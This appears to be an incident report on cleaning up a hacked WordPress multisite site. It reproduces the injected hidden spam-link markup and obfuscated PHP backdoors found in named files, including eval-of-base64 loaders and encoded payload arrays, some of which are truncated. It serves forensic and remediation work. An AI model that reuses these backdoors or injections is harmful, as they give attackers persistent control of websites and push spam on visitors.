Professional Documents
Culture Documents
http://domain.com
Contents
1 Task: Remove SEO Spam and migrate site from WP multisite to single ............................................... 1
2 Discovered vulnerabilities ..................................................................................................................... 1
2.1 Injected code examples found in posts: ....................................................................................... 1
2.1.1 Example 1: ............................................................................................................................. 1
2.1.2 Example2: .............................................................................................................................. 2
2.1.3 Example 3: ............................................................................................................................. 2
2.1.4 Example 4: ............................................................................................................................. 3
2.2 Backdoor scripts found ................................................................................................................. 3
2.2.1 Location: wp-content/themes/user/functions.php ............................................................. 3
2.2.2 Location: wp-includes/images/crystal/swfmacwheel.php .................................................. 4
2.2.3 Location: wp-includes/js/tinymce/plugins/fullscreen/ie_png.php...................................... 7
2.2.4 Location: wp-includes/js/tinymce/plugins/fullscreen-randomfunctions.php ..................... 9
2.2.5 Location: wp-content/plugins/aegis.php ........................................................................... 11
2.2.6 Location: wp-content/uploads/emmos.php ...................................................................... 11
2.2.7 Location: wp-content/blogs.dir/swift.php ......................................................................... 12
2.2.8 Location: wp-content/themes/openvme.php ................................................................... 12
2.2.9 Location: wp-includes/ID3/x11r3.php ................................................................................ 13
2.2.10 Location: wp-includes/js/dcn.php ...................................................................................... 13
2.2.11 Location: wp-content/backup-db/ieupdate.php ................................................................ 14
2.2.12 Location: wp-includes/Text/Diff/Renderer/tabs.php ......................................................... 16
2.3 Exploits found: ............................................................................................................................ 18
2.3.1 TimThumb Exploit ............................................................................................................... 18
3 Fixed Vulnerabilities and Rescan results ............................................................................................. 18
4 Suggestions ......................................................................................................................................... 18
4.1 Disable insecure/dangerous PHP functions like eval function on server. .................................. 18
4.2 Secure Wordpress website ......................................................................................................... 18
1 Task: Remove SEO Spam and migrate site from WP multisite to single
Details:
https://sitecheck.sucuri.net/results/domain.com/
image
We have spam on our site, also I want to have the installation moved from network to single wp install
on our plesk server.
2 Discovered vulnerabilities
2.1 Injected code examples found in posts:
2.1.1 Example 1:
<div style='position: absolute;left: -3667px;'><a href='http://bonacousa.com/kredit-zalog-
nedvizhimosti/'> bonacousa.com/</a></div><div style='position:
absolute;left: -3752px;'><a href='http://meta-osvita.com/tehnicheskij-anglijskij/'>meta-
osvita.com</a></div><div style='position: absolute;left: -3818px;'><a href='http://nissan-
ask.com.ua'>http://nissan-ask.com.ua/</a></div><div style='position: absolute;left: -3595px;'><a
href='http://www.viagra-generica.com'>viagra-generica.com</a></div>
@ 1
2.1.2 Example2:
<div id="Leyout101" style="text-indent:-26529px;width:0px;height:0px;color:#ffffff;font-
size:0.1px;display:none;"><script
language="javascript">document.getElementById("Leyout101").style.display="none";</script><a
href="http://www.physics2005.net/toms.php">toms outlet</a>
<a href="http://www.physics2005.net/toms-outlet.php">toms outlet</a>
<a href="http://www.physics2005.net/toms-outlet.php">toms outlet</a>
<a href="http://www.paulcash.co.uk/michaelkorsonline.php">michael kors uk bags</a>
<a href="http://www.prettiness.nl/wp-content/uploads/hollister-shop.html">hollister online shop
deutschland</a>
<a href="http://www.physics2005.net/toms.php">toms outlet</a>
<a href="http://www.leecommunications.ie/wp-content/gallery/italviero.php">portafoglio alviero
martini</a>
<a href="http://www.physics2005.net/toms.php">toms outlet</a>
<a href="http://qa29.it/">prada portafoglio</a>
<a href="http://www.leecommunications.ie/wp-content/gallery/italviero.php">portafoglio alviero
martini</a>
</div><div style='position: absolute;left: -3851px;'><a href='http://teplostar.kiev.ua/catalog/gorelki-na-
otrabotannom-masle'>http://teplostar.kiev.ua/</a></div><div style='position: absolute;left: -
3761px;'><a href='http://service01.com.ua/%D1%80%D0%B5%D0%BC%D0%BE%D0%BD%D1%82-
%D0%BF%D0%BE%D1%81%D1%83%D0%B4%D0%BE%D0%BC%D0%BE%D0%B5%D1%87%D0%BD%D1%
8B%D1%85-%D0%BC%D0%B0%D1%88%D0%B8%D0%BD/'>http://service01.com.ua/</a></div><div
style='position: absolute;left: -3771px;'><a href='http://winnerlex.com.ua/nashi-uslugi/nalogovaya-
praktika/otmena-nalogovykh-reshenij'>http://winnerlex.com.ua/</a></div><div style='position:
absolute;left: -3686px;'><a href='http://showroom-kiev.com.ua/category_145.html'>showroom-
kiev.com.ua/</a></div>
2.1.3 Example 3:
<div style='position: absolute;left: -3682px;'><a
href='http://babyforyou.org/'>www.babyforyou.org/</a></div><div style='position: absolute;left: -
3717px;'><a href='http://bonacousa.com/kredit-pod-zalog-avtomobilya/'>
bonacousa.com</a></div><div style='position: absolute;left: -3982px;'><a
href='http://www.etalon.com.ua/dispenseri'>www.etalon.com.ua</a></div><div style='position:
absolute;left: -3597px;'><a href='http://www.pillsbank.net'>pillsbank.net/</a></div>
@ 2
2.1.4 Example 4:
<div style='position: absolute;left: -3522px;'><a
href='http://baly.com.ua/gallery/6/'>baly.com.ua</a></div><div style='position: absolute;left: -
3795px;'><a href='http://bonacousa.com/kredit-zalog-nedvizhimosti/'>
www.bonacousa.com/</a></div><div style='position: absolute;left: -
3935px;'><a href='http://goodgoods.com.ua/g8737298-tabakerki-
futlyary'>goodgoods.com.ua/</a></div><div style='position: absolute;left: -3846px;'><a
href='http://www.pillsbank.net/rezeptfrei/kamagra'>www.pillsbank.net</a></div>
@ 3
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6
%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO
0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$
O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{2
4};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00O
O0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTz
AwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU
5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1
TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdv
YnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dn
hJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aE
kwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgz
TER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFs
KCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8
wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw==")
);
Decoded:
<?php $O0O000 =
"PxtDQqfzYahmwCvZNuBjLXsMUkIKJbHEWOgFyVASGiRnlTdcropeNFSBHDJkxUbKYCsEGXtfjIwqnhpAzgRl
WVveoTymauLdiOrcPZQMNB9YURyGCuLKrWSFpB0vHCLJL0TnWorKrWSFz107paiKACLKrWSFpB09pCr0zo
i7EWGZgobyEIEbgCvhI1tNn1Lgz2E1x2S5g3n0qkpFz10QAOSiMai0V30GCKTfUa8vxItQnKTFrWTkrCvQVY0
AEdTXx3LQg24vxItQnKTFrWTkrCvQMY0ACWiKAlyhI0reTewdg3ydImy9Nmydx2bix2wdAH0ACHi7BHZzCm
toEIL1cK4vpKGsgK5ix3LDxK1srKTQc29PpfwGCvhzpaT4UIHZAOwGCvhvpCyvJH0AJH0ANk4=";
@ 4
<?php $bwkw =
array('eNrFOwdX20i3f4WwORv8UaJuaYnzEZppJmDALZvDkWXZF','pZLXLBNNv/93bl3ZlQsSHib894mUZm
5c+f2MvKuBe21jT','ft2cCbBsPBvb8IJtPJxrswfJfLrX1fExNrYbjxNsh9f+s','WPo3H7nLj3butd7V5oYC3d2s77/
CRPdTY5ZN8vZhHj0ub','PV6w505slF1x5rbqWOzFrS7YbVK/sRUEYZcHxNs5L7L75','WOztt9lTy18D4Nm8S5
/esSe1dubu7sOe/p8YCBtn5f7Nc','JrsluvqeNKdnk6PTLvTg/rsxJ7O+ghGeyxyi4Ou1hAzqT','Onm6QUhVJegB
SjhHNqMlu/fJjSy/lT4+BjGMY67PBMruw','8c5teN25vDEWn9nIcj9sBoimcveEnHa8Ae5glXAPw+R7z','Eo3v
U5ZQ9AHl900G3GyS+nh0/zzIYoF4ZGFh9PF5c0+ey','q6tbOwgbQ5BorwqcTZNBZc2i6yuWCSVpEl9grks1szx
hJ','7B7bYTbAbZw01inphLKJCkcXK3bKHc2WtgsS5nHxGOpKC','7H9CtZUOrztE02LCBkjkxApqT1rXWVjvh7g
Lsndgzy8e6','oU0Sysa4wYUYw/1pyMhcTZHsTlk6zZkV9Ag4mQsEnvs9e','5pgjAeuwzqoEHDpL1OZ6XbT7jX
6VErrGvTR9LCKbvOYW6','O1nB7pOAIGm9j5KHlVPpkpJ3H0tLQiP6jObDo4ctxv1Fx','psiGVg5huKkDRegJTlC
vXYaNIgho6517Ula8wyHKHDwRH','ZX5HbneKbkeeRc4ZsyR8W/cd5Fm+XpdvUQWG7X9yEPvUP','DdZr+l1
qut8HOwj2JDsgJV9ZZzFFSjauRRWLe4dE7ejYv','nh9dDtgUalObMyIsqDy1pBIjxsfkwlCZ3rS2kR3gaork8','6Cj
ngAawwSMxzTk/oMBzVTxbnh4g95ucV2XxWNeOFTIfZ','1Y7HD4yiyo6yGi9Viar0QzrlKLb4TXdkAikB83jQFI
mJH','kWSO/UL4P6Q+kWVb04C3DM/Hwjzf2BLMLrnz4dIVsIj2N','ovSrHtaCxIwlXOqg/XN52hH4Y2YxkRi4
MIW4eVJELvdVu','Re40qWmNR69YmQFo6VqSfoUS76inJ5eKX12EVzetB5LBg','qT9MJrWa2ekEc0YsIer3iW
G5WbQQu2eFnmgQI0iu5Omdt','zjMkTDP1BQXGV0p+5Z5XBiX2gd9aoTM8VIddLXkoplrhF','ZybxBysFtE2b
taeQ74DdkT4QR/Qd8h3SNkkdTAz/CiJ2x','sqaFszoZn9ooVtrc5biDYpDk4ABaMcj0L9sYsggUVjzVq','2eoEgD
FJa2q+cBzGgq5OSgJFus8svH01W6taq9ZPTbYZr','CR2iqGjzwkKJT9VMFxU68o3gn6Fk7VtDNio98IvT5yPGu'
,'QtyOGKqpm2tTPTNxTW4yaSEyoMJNBq7jT0ESvpZIatbMl','iRbJbDeLzoAhhBshqSy9vrP0orDU6IcTkIPqFcE
XZRIuP','0W8xyxYpvBIDogVZIESFvLAfCoVgFiTsgG5RDKpKCALlb','ImymKGy7gsqhWSAfKPYiL+gffriAuU6Nk
SIIFnjCaSb8F','zFE1pK8Y3QqKKkP9qmfIj453pvNVGjolXlEMtyWvtU6IO','48G7fOQcVu7UY0ph5fZdD+3sCp
UflWk1euSL7og1EdJub','pC4/bsajjXObo9wAIPVNQKrx2zZUfe6puKSY4pxmJVrmd','UgVU/zGTHcmZ0HZbt
2YA6pqFNwnI+hIDD9o82WMfFdBMN','e+1j69wwNpnY5v0AfZnPzmYsx6XJ+husW3gXmk9EQ8GNd','wmD
q6K+N6dnJwpOprH+peDKYoyIYHYpXnPfOrxNx5+Jp0','W0cGrPzh9hyCHBXgfPkkjNcPFFibJyUNoFqwISqhn
eM3J','sX+uWIMFH4eUDRISi+90+XqK7AkRWTe53MzLRDUEIXZMR','IbyGitFM5QIQlYycDiXbfRLAipKdb49
HTejFWIRudbuLU','A07Jeh6lIDYHQVMQ7ElTQ9zOU7QZlQa10qbkgUkGZe6Ez','RpJBuf0UpwA7lEP7pPYieJ
nU7scc/aE33DCepTSPS57B9','7hGbNxiWN9aFRNhVIa8YDGh9gvqawalIUOnvgSt0YOehU','Y366O5xis61pI
dvNkUIaccwNYKGieg+tNbrqMENyxPrgm','bRMxSY2iZQ8Ro77fbQ4W/aZmKu1ieYSRL+h1aA4pMaEFc','gA
1epCLYqpgzdLQukr7hKpesrny8LyyeCImR563HDVLB8','qyVptIK2nD/HnQnbdOFnOfWiPw0C5VxX30/mWjv
4AGYKG','5tcsRFOQTF7VWNhluwCutz1sOh5RTK0pTR/RD9OZquQfF','4IiLBPVTv9kfev1K/4r6oG8odJBu/VZ
atXex7D55xWNUU','rvYeGwOyrKO5dkVnfCcvOGxQvmcfGw+9EiU6OZkOSmR6m','UUJSdriPrXEXFIxXmDh
WO7hc/hk1s9GzWj4hS16t+EINa','hVZNBq/TtvHgMeQfR2i6R2YO6YXZ+Y8BcNyQzbQ1B5Do9','I1uKewC4
UOACX+mbTI5Pn6alUMXGpYSTKuyLEh5K+Z+Ub','e+kM+JOJsSMQAhDRTbK4+oGjVkW1CR2EjkF6uMZF7k
N1Q','t6+fktGXulhiIm/2ZixpyBNR23XGQHRR1QWyhEfRGMEFX','KktCqBcufQ2mcZLnITrcb1bHlx3YRi89Ro
1iG/gwstu9o','UIb0myR2pKjGxcfxMSvvtmq4dtSQFWSZ4hPDIQ8fUBTdU','5zvLhtSB3VhKmiB4NgIAHGB3
WVsOD+5nEdFjRlZa9+Zgc','p7UYtbH0EQq/DoGomTAkDCYjGqxkWJhZgThdTRIzgrOir','alkriI5bIQZlzUtFLpS
BZO3dSclAUKVMRVw8WHxD+TCHO','z2FMjChCEGVRqpBU8SDE16XOvVp3LmRmwHjIRIaqYSJj4','kK6qqb
d6CNLM1S1EBWqnERFrV+UjPTWHJY8Uhldwe18jr','ql74MlIjqlQb2LRVmG4gPPZaTQ0VPrhFVmLJyJggR1C
2F','s324WK/3WQUhSpCaBcWLVuL9LLVQmMpZfyFYubPl0JDO5','RE4UkpA0Nl5NaJSNL1TpoyPszKDAGEis
NoHydBv1nldUH','GLt7j2Z9ukheXajqj5dyUZ4wlInJbd9+4qsV6ZZFPWTQa','Blci5KcGh17YNPNlU85VED3ZK
DQtpkKZNotDGNsnexKda','Io9YJpvbNNqcL3UOjKOrxTU/KQevQlFwCfUodsV6zxp3K','4f0eFX/lsER1UbnSxa
x6TfmXQ6Gz1AlKlhRUm7ajQ8uLP','qiXF26DS1YqxlpMrEA0SHEHZE6or1ubMji3QAThmfCAst','j5rU0VR8yn
Decoded:
@ 5
<?php if (!function_exists('ll')) {
function ll($i) {
$a = Array('', 'Xw==', 'Xw' . '==', '' . 'X' . 'A==', '' . 'Lw==', '' . 'Ly8=', 'L' . 'g==', '' . 'Ly' . '8=', 'TW96' .
'aWx' . 'sYS80' . 'L' . 'j' . 'AgKG' . 'NvbXBh' . 'dG' . 'libGU7IE' . '1TSUUg' . 'OC4w' . 'OyBX' . 'aW5' . 'kb3' . 'd' .
'zIE5UIDYuM' . 'Ck=', 'T' . 'W' . '9' . '6aWxsY' . 'S' . '81' . 'LjAgKF' . 'dpb' . 'mRvd3M7IFU7IFdpbm' . 'R' .
'vd3MgTlQgNS4xO' . 'yBlbi1' . 'VUz' . 'sgcnY' . '6MS' . '45' . 'LjAuMSkgR2' . 'Vja' . '28' . 'v' . 'MjAwOD' . 'A5'
. 'M' . 'jIxNSB' . 'GaXJlZ' . 'm94L' . 'zMuM' . 'C4x', 'TW96aW' . 'xsYS81LjAgK' . 'Fdp' . 'bmRvd3M7IFU7' .
'IFd' . 'pb' . 'mR' . 'vd3MgTlQ' . 'g' . 'NS4xOy' . 'Blbi1VUyk' . 'gR2V' . 'ja28' . 'vMjAwM' . 'z' . 'A' .
'1MDQgTW96aWxs' . 'Y' . 'SB' . 'G' . 'a' . 'X' . 'JlYmly' . 'Z' . 'C8wLjY=', 'TW96aW' . 'xsY' . 'S' . '81' . 'Lj' .
'AgKFdp' . 'bmRv' . 'd3M' . '7IFU7' . 'IFdpbmRv' . 'd3Mg' . 'Tl' . 'QgN' . 'S4xOyBlbi1V' . 'Uzsg' . 'c' .
'nY6MS45Lj' . 'IuMTAp' . 'IEdlY2tvL' . 'zI' . 'wMTAwO' . 'TE0I' . 'E' . 'Zpcm' . 'Vmb3' . 'gvMy42' . 'LjEw', 'c2' .
'FmZV9t' . 'b2Rl', 'b3Blb' . 'l9iYXNlZGly', 'aHR0cDo' . 'vLw=' . '=', '', '' . 'Iy' . '8' . 'j', 'Lw' . '==', '', '', 'Lw==', '' .
'L' . 'w==', '' . 'QWNj' . 'ZXB0' . 'L' . 'U' . 'xhbmd1YWdlOiBl' . 'b' . 'i11cywg' . 'ZW47c' . 'T0' . 'wL' . 'jU' .
'wDQo=', 'Q' . '29ubm' . 'Vjd' . 'G' . 'l' . 'vbjo' . 'g' . 'Q2x' . 'v' . 'c2U' . 'NCg0K', 'DQoNCg' . '=' . '=', 'Cg==',
'PGJyIC' . '8+', '', 'L0xvY2F0aW' . '9uXDov', 'TG9j' . 'YXRp' . 'b246IA==', 'DQ==', 'D' . 'Qo' . 'N' . 'C' . 'g' . '==',
'', 'Ji' . 'M' . '3NiYjMTE' . 'xJiM' . '5OS' . 'Y' . 'jO' . 'TcmIzEx' . 'NiYjM' . 'T' . 'A1Ji' . 'MxM' . 'TEmIzEx' .
'MCYjNTg=', '' . 'TG9jYXRpb246', 'Y' . 'Wx' . 's' . 'b3dfd' . 'X' . 'JsX2ZvcGVu', 'MQ' . '==', 'PG' .
'g1IHN0eWxlPSdj' . 'b2xv' . 'cjptYXJ' . 'vb24n' . 'PkNh' . 'bid0' . 'IGR' . 'vd' . '2' . '5sb2FkIA==', 'I' . 'C0g' . 'RV'
. 'hJVDs8L2g1Pg==', '', '', '', 'Cg==', '' . 'c' . 'g' . '=' . '=', '', 'c' . 'G' . 'lwZQ==', 'd' . 'w' . '==', '', 'c2FmZV9tb2R' .
'l', '' . 'b3Blbl9i' . 'YX' . 'Nl' . 'ZGl' . 'y', 'c2FmZV9tb2R' . 'lX2luY2x' . '1ZGVfZGly', 'c2' . 'F' . 'mZV9tb2RlX2V4' .
'ZWNfZ' . 'Gly', 'ZGlzYWJs' . 'ZV9' . 'mdW5jdG' . 'lv' . 'bnM' . '=', 'YW' . 'xsb3' . 'dfdX' . 'JsX2ZvcGVu',
'bWF4X2V4ZWN1dGlvb' . 'l90' . 'aW1' . 'l', 'b3V0cH' . 'V0' . 'X2J' . '1ZmZlcml' . 'uZw==', 'b' . 'WV' . 'tb3J5X'
. '2xpbW' . 'l0', 'Mj' . 'U2T' . 'Q==', '' . 'ZXJy' . 'b3' . 'JfbG9n', 'bG9nX' . '2Vycm9ycw=' . '=', 'ZmlsZV91cGxvY'
. 'W' . 'Rz', 'YW' . 'x' . 's' . 'b3' . 'd' . 'fdX' . 'JsX' . '2Zvc' . 'GVu', 'bWF' . '4X2V4' . 'Z' . 'WN1dGlvb' . 'l90aW1l',
'b3V0cHV0X2J1Z' . 'mZlcmlu' . 'Zw==', 'bWVtb3J5X2xpbWl' . '0', 'MjU2TQ=' . '=', 'Z' . 'XJyb3JfbG' . '9n',
'bG9nX2Vycm9yc' . 'w==', 'Z' . 'mlsZV' . '91' . 'cGxvYWR' . 'z', 'YWxsb3df' . 'dX' . 'J' . 'sX2Zvc' . 'GVu', 'XA' .
'==', '' . 'Lw==', 'RE9DVU1FTl' . 'RfUk9' . 'P' . 'VA==', '' . 'XA==', 'Lw==', 'U' . '0' . 'N' . 'SSV' . 'BUX0' . 'ZJTEV' .
'O' . 'QU' . '1F', 'UEhQX1N' . 'FTE' . 'Y=', 'XA==', '' . 'Lw==', '' . 'KF' . 'wu' . 'cGguKiR8XC5o' . 'dG0u' .
'KiR8XC5' . 'za' . 'H' . 'Rt' . 'LiokfF' . 'w' . 'uY' . 'XNwLi' . 'okfFwuan' . 'NwJH' . 'xcLm' . 'podG0k' . 'fFwuY2' .
'ZtJHxc' . 'L' . 'mN0c' . 'C' . 'R' . '8XC50cGwkKQ' . '=' . '=', 'LzxhZD4uKjxc' . 'L' . '2FkPi9zaQ==', 'Lz' .
'xhZHM+Lio8XC' . '9hZH' . 'M+L3Np', 'Lzxi' . 'YjE' . '+Lio8' . 'YmIyP' . 'i9' . 'z' . 'aQ==', '' . 'L' . 'z' . 'xiMT' .
'4uKj' . 'x' . 'c' . 'L2I' . 'x' . 'Pi9zaQ' . '=' . '=', '' . 'Lzxi' . 'YjE+' . 'PGJiMT4vc2k' . '=', 'LzxiYjI+PGJiMj4vc2k=', 'L' .
'zxhZD' . '4uKjxcL2' . 'Fk' . 'P' . 'i' . '9z', '' . 'Lzxl' . 'bXM+' . 'L' . 'io8X' . 'C9lbX' . 'M+' . 'L3M' . '=', 'LzxibG' .
'9jaz4uKjxcL2Js' . 'b2Nr' . 'Pi9' . 'z', 'L' . 'zxkaW' . 'c+Lio8XC9kaWc+L' . '3M=', 'LzxjZW50' . 'cj' . '4u' .
'KjxcL2Nlb' . 'nRyP' . 'i9z', 'LzxjaXR' . 'zPi4qPFwv' . 'Y2l0c' . 'z4v' . 'cw==', 'Lzx0Y' . 'nQ+' . 'Lio8XC90' . 'YnQ' .
'+L3M=', '' . 'L' . 'z' . 'w' . 'oc' . '3Bhbnxmb250fGRpd' . 'ikgc' . '3R' . '5bGU9Lioo' . 'aG' . 'Vp' . 'Z2h0fHdp' .
'ZH' . 'RoKVxz' . 'KjpccypbMC0yXXs' . 'x' . 'fVxzKihwdHxwe' . 'CkuKihv' . 'dmV' . 'yZmxvd3x2aXNpYmlsaX' .
'R5KVxzKjp' . 'c' . 'cyooYX' . 'V0b3x' . 'oa' . 'WRkZW4p' . 'Lio+Lio8YSBocmVmPS' . '4qP' . 'FwvYT4uKj' .
'xcLyhzcGFu' . 'fGZvbnR' . '8' . 'Z' . 'Gl' . '2KT' . '4vVX' . 'Np', 'Lzwoc3Bhbnx' . 'm' . 'b250fGRpd' .
'ikgc3R5bGU9' . 'Lioob' . '3Z' . 'lcm' . 'Zsb3d8dm' . 'lzaWJpbG' . 'l' . '0' . 'eSlccyo6X' . 'H' . 'MqKGF1dG9' .
'8a' . 'GlkZGVuKS4qKGhlaW' . 'dodHx3aW' . 'R' . '0aClcc' . 'yo6X' . 'HMq' . 'W' . 'zAtMl17' . 'MX' . '1ccy' .
'oo' . 'c' . 'HR8cHgpL' . 'io+Lio8YSB' . 'o' . 'cm' . 'V' . 'mPS4qPFw' . 'v' . 'YT4uKjxcLyhz' . 'cGFufGZvbnR8ZGl2'
@ 6
2.2.3 Location: wp-includes/js/tinymce/plugins/fullscreen/ie_png.php
Original source code:
<?php $azwskh =
array('eNqlWgl3Gsey/itEx8cS7zrO9CzARCEHLSAhC7ggG','AGODweGEduwXBaxOP7vr7uquqdZpOTexDHD
dFd/XX','tXF44NXmIXP72sJv5yMJ20gs1gsVxcnIfheTwe+x6','TE7EwvPgwiH//0E5fzeft7cW5b+bGTe889vnc
XXZM','8ayE55/OO9Z12BFvoTsQj0a9GDbvYGDLp8Uq8dL0x','Cq+gn+viw8zXDXMDWveeS9N8X4nycXLm
MgBpm56dv','O5KL6/aMi0atd4Fl8exMcCdwIeYdfusyMewy4ue+1','MCuJLmi9vPG+AvGN1X7rAFULUzearf
+ethGhi4Dln','AwPwXXwUWfeOI4Wu0X5mQgOI4hn+vfgGuxt184E1x','83QBzbCVXOdTktSQPGWuOzBqZu
bGY6BcgwiK1Rhy6','KQtP6w5ZSggM6dK54Twd6dO+GsbcW7P3bxifvA0nG','44GoU3xhMgb42r6ivyk7oAIT
aLEAH9UiFug6ewSA2','DoMhWBc1/woSRHroWCCYARvd7+kBpPPH+3pQGvWW8','B2Wc32Ad2zEJ9dLKP
TBdUF6EKO6Lk7pgetAGrkpdA','BboB5QB+KD6wH2P9QDAIPr1B+4L4BDSV1UgQyQEm1','yn8ZTyngcim9X
4qMnPr7ALuCwr0rS+nWfvFB8DGDs','rpYUj7z4yLLqk3jWar3SDah8Xdpeq3BpPzsjYm+Xz','zq1/C0wvQJ/Bv
pRmsINYweMjPtJFwW0kFtsgEEKYd','QGa1UM/3b6+kjWwQX5bQqCh78+rkGjclIMwMujGI7','myhilw2Ydtj
Iea6DqfmfcZajjrtJAacDzxoChSbbr','XhRgdtKvGmtUam19W54CtOmuOmNvCLEHm0x7ZfQS0','LFv1oo3PQ
PVj/zfio+y+JgWQUM9YFL7+u+7h23+Jv','WvSOZHg5zDzBltNPeqzjVD09U7d9ioV2aoXgiKRP4','KsG7Lyutu5
aY9qbGHQcEqDhrDQjW74d8hKZWeGqhe','8R3AMVnkd1ngAemVZzG+bsPXEw24DNBFHtAYFqvKC','cXOV
UwWOssJPlxReerhqcrygrI4bIIhHod5A5jx1q','tn2KSxLHkqh3QKNwYGKIwJmis+b8wFxO7BB38YZo3','6jdM
pPBnburdYw1g17IJtAVIsYf5jyOf4+Bd0peKu','4qPNQaxt0QO/UjtwSMWBioqnBTIPHPHlHrhGYWCwu','lwO
u4IGJUwkBC0HpiokfzNijK1XyikFF5jeQFZlua','5k2inu7wj5HXYE+9CuuCMk9h0kMb68AOuUfMqcgny','JXIU
qNQPtI5gZVCdNXdj1Ufsa888R0+KTZJfQC7UU','DJTnRgMP2eDp4yF3GM/IBcEjB8CSNB7IWi1yYcB4V','iFUv
K5KVWHY/LaIeULtimrbouw2uvHtNakTUiKDsd','x6RbQ2GCsnvcwsao4ITA9h2U7AwfuujDtdOXxIjKD','ZUc5
tYRcKhoGtQnmPueKwK8NhU+SaLFQba92Ohw64','E3yPIBxJHvhe2peJSdMD/x7JMdoRuVkISQ4YL29VV','G
SdAtubMpEZ0tpQpX9S1I6mFUPFW4BhNL4rXUX5HK','w9klMgmm4+3CGP2kPIrYwAEBty/Fo6T+k2RIbLaW
Q','IHMKm6W2JW7N02xfacuBgbzBprSimrkn3kKFIS/k1','Jy/dYiHBN9gKZRFvhibutoDhF+WFpkTYFXIkUtVX
G','U2aihSrKdFWIoEXopthrPhY29zY3Kk1n/FkQEv920','UyW6lalm4lXEpZUvg2PxIEEpoJdk6DqDkh5o5nFTR
','81ReaghqpgCcOilehTRsO8QvyF3NyWUEWlGQZYL0k','UYc16X1og+EIkSuktOiwKTDNJ7yFiVmgT2k9K0+J
K','HsCOTKqoCATwIKCsoBUaigia1P3om2e1WkBSVfEsQ','o8jemSOuxlSIGQ6xLpAE8QrK1FGkQo6dDcY8XJk
Wc','koJ415zI77u8MWwvDRNFXsCmHHx4uPABMaV50zZCY','VF7ioArFQWuoiEQflHFOuapg1QX5rneSVAb
ATgYJ1','hky9aE21VKKTFMj0ZhUZRrlrvIGd27ompTyEQSFnl','wGGVX4rKG0KJhUPhoxiqEH3CgNPqkTT9ciq
qGmMbP','HiJ4H9hSOteSurpTdk8fzgQzEmGSqZhHDTlQMGUdi','R+TOvkl7suw40hblYYwCdXrJ5ZvisCDjkI6
hXQGOI','V9ZRzvM0ZW10gKYEbHWoORr26qI8fAyeFh9IbktnU','XGTSFkUR2AVYgq6NRVRxZwsqAR9R+Pq
2ood5GlglS','DjMwiz+FFcRqEem2jmOJRKvW/LVRzuqOs6xSGhV46','yqxZcYRC6sDcB1ZXebx426BSl/jEIqOo
ZZwi1DBRE','Qowh3VLJaqGxLEkSHL6WQlJy4aapprXCiznKHHddj','UotatRgpIH5VQnNGRi5SC4XBagWbEEO
RiWowbCyFH','FlV7C8TqgoJJXHo/hLPKrkrSKni2YEgQo4LkUKiuX','PLlp1lIlTxWOLy45rNQ8WJAYZC7kr6wn
VaaVZnQW9','aWNEBHvgySSxXW+kqbEGvno3EG9jwwZqMXqteR9Az','FCzlLYjfaT6ZWt5Sm7AKe0hNEKwK
iELg6V7zvqYI8','SqZBjXSxrp7YsL7N4FSTrlW6vI3miumtX7EWhA6dV','T69flC+Jy1tBi7KqOg9FPRB5aLVMVS
qGVrEK1RIaG','ZjTSn88SrEGLrCjGhiTTqnaJXJfN+leDtZspPb4Er','UOkLGesV+N9CN1CM0eXAllYQNLPajlS6q
qqlnKXsD','NUdEeldNXTpTK1ZVC5QdMvDAklrVFr+RKeTE4oOm+','NrEXIZotPjawoqbbBPTbgb2LK8jJY1eEa
YMe2Pnqd','821hPVhCLxhBtvcebLy9nH9AHs6ZeIJEoePTadF+9','lbda+UI8COFjbI4IKM7Pt3/bVsAD07o+Dp
GvwZ3x+','22MzFnhwn66Kg2+Y9cLVt1vEKQAw3zH7fH29egexe','dYfB1Ni2snyrEvoY//59aLTv3JWk0PqvHa
1JBkx62','06k7s5dOEC0riWH7kNI90F0p+ned2cgtOktmnXIwa','i13BK1v0F/jMIqwDbnSpn0zrMB6AGb22P
QM+w8pg4','09AhVO7nznFt0zdy2WY64MLt4SEaWeMl54GHUyfQf','R7lJE3vUhnLP2xk2DO8LvTr4nQt9uH
ZZb87Vw2X/E','chn1xB63qwbqIxTU9XTC656RL0/DmzJipdl2B9DPC','+rPL9YQ31zinIlGz6pph/EERkwaqKBk
ZTNIEKbZWW','wbpSPsFW76txDtq2Nog1BSlbJ1Y1ctpIDez3lKrVa','zvVqoBcPysE6fM+hs9ecmkCBoeLTkwK
@ 7
Decoded:
<?php if (!function_exists('ll')) {
function ll($i) {
$a = Array('c2FmZV' . '9tb2' . 'Rl', 'b3Blb' . 'l9i' . 'YXNlZG' . 'ly', 'c2Fm' . 'ZV9tb2Rl' . 'X' .
